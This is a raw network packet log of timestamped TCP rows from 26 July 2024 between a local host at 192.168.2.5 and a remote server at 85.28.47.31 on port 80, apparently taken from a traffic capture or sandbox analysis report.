Jul 26, 2024 20:09:13.113095999 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.113111019 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.113126040 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.113137007 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.113142014 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.113157034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.113159895 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.113173008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.113173008 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.113183022 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.113188028 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.113204002 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.113205910 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.113215923 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.113218069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.113230944 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.113233089 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.113245964 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.113248110 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.113262892 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.113262892 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.113275051 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.113277912 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.113293886 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.113296032 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.113308907 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.113315105 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.113326073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.113337040 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.113343000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.113357067 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.113358974 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.113367081 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.113373041 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.113389015 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.113401890 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.113413095 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.114047050 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.114063025 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.114078045 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.114090919 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.114092112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.114104033 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.114106894 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.114123106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.114128113 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.114136934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.114147902 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.114152908 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.114168882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.114175081 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.114183903 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.114198923 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.114202976 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.114213943 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.114222050 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.114228964 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.114245892 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.114253044 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.114260912 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.114269018 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.114295006 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.114640951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.114656925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.114675999 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.114690065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.114692926 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.114705086 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.114707947 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.114720106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.114727020 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.114734888 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.114744902 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.114751101 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.114774942 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.114774942 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.114789009 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.114795923 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.114804029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.114814997 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.114819050 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.114833117 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.114835978 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.114845991 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.114849091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.114865065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.114866972 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.114875078 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.114881039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.114896059 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.114897013 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.114907026 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.114912987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.114918947 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.114928007 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.114938021 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.114943981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.114955902 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.114969015 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.114985943 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.606123924 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.606529951 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.607848883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.607867002 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.607883930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.607898951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.607914925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.607930899 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.607935905 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.607968092 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.607999086 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.608000040 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.608025074 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.608026981 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.608040094 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.608055115 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.608072042 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.608079910 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.608088017 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.608118057 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.608140945 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.608145952 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.608191013 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.608299017 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.608314037 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.608328104 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.608341932 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.608356953 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.608371973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.608386993 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.608402014 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.608417034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.608584881 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.608778000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.608793020 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.608814001 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.608828068 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.608844042 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.608843088 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.608859062 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.608875990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.608876944 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.608890057 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.608903885 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.608905077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.608921051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.608936071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.608937979 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.608949900 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.608964920 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.608968973 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.608980894 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.608994961 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.608997107 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.609011889 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.609021902 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.609026909 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.609041929 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.609050989 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.609057903 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.609071016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.609071970 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.609087944 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.609117985 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.609152079 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.609852076 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.609877110 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.609891891 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.609901905 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.609906912 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.609921932 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.609935999 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.609939098 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.609952927 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.609967947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.609982967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.609987020 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.609997988 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.610013008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.610018015 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.610027075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.610042095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.610048056 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.610059023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.610080004 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.610081911 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.610094070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.610107899 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.610111952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.610127926 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.610136986 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.610142946 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.610157013 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.610174894 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.610203028 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.610753059 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.610776901 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.610785007 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.610800028 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.610815048 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.610830069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.610842943 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.610857964 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.610872984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.610887051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.610899925 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.610901117 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.610917091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.610933065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.610937119 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.610949993 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.610964060 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.610974073 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.610981941 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.610986948 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.610996962 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.611012936 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.611027956 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.611028910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.611042976 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.611110926 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.611741066 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.611763000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.611778021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.611790895 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.611792088 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.611807108 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.611820936 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.611833096 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.611835003 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.611850023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.611864090 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.611876011 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.611879110 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.611892939 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.611907005 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.611907959 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.611922026 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.611936092 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.611938953 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.611951113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.611963034 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.611965895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.611994028 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.611996889 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.612010002 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.612020969 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.612025023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.612040043 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.612055063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.612062931 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.612099886 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.612818003 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.612842083 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.612857103 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.612869024 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.612874031 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.612906933 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.612946987 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.612967968 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.613010883 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.613020897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.613035917 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.613049030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.613064051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.613070011 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.613078117 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.613092899 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.613107920 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.613111973 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.613122940 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.613137960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.613147020 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.613152981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.613168001 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.613172054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.613185883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.613194942 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.613202095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.613215923 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.613229990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.613250017 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.613290071 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.613524914 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.613539934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.613554001 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.613568068 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.613574982 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.613590956 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.613605976 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.613612890 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.613620043 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.613635063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.613656998 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.613658905 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.613672018 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.613682032 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.613686085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.613708973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.613711119 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.613723040 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.613737106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.613739967 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.613750935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.613765955 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.613780975 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.613791943 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.613795042 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.613811016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.613826990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.613836050 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.613841057 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.613876104 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.613898993 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.614639997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.614656925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.614670992 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.614686966 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.614694118 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.614702940 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.614710093 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.614717007 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.614733934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.614748955 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.614757061 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.614763975 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.614779949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.614789009 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.614814043 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.614850998 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:13.615302086 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.615317106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:13.615339994 CEST	80	49704	85.28.47.31	192.168.2.5
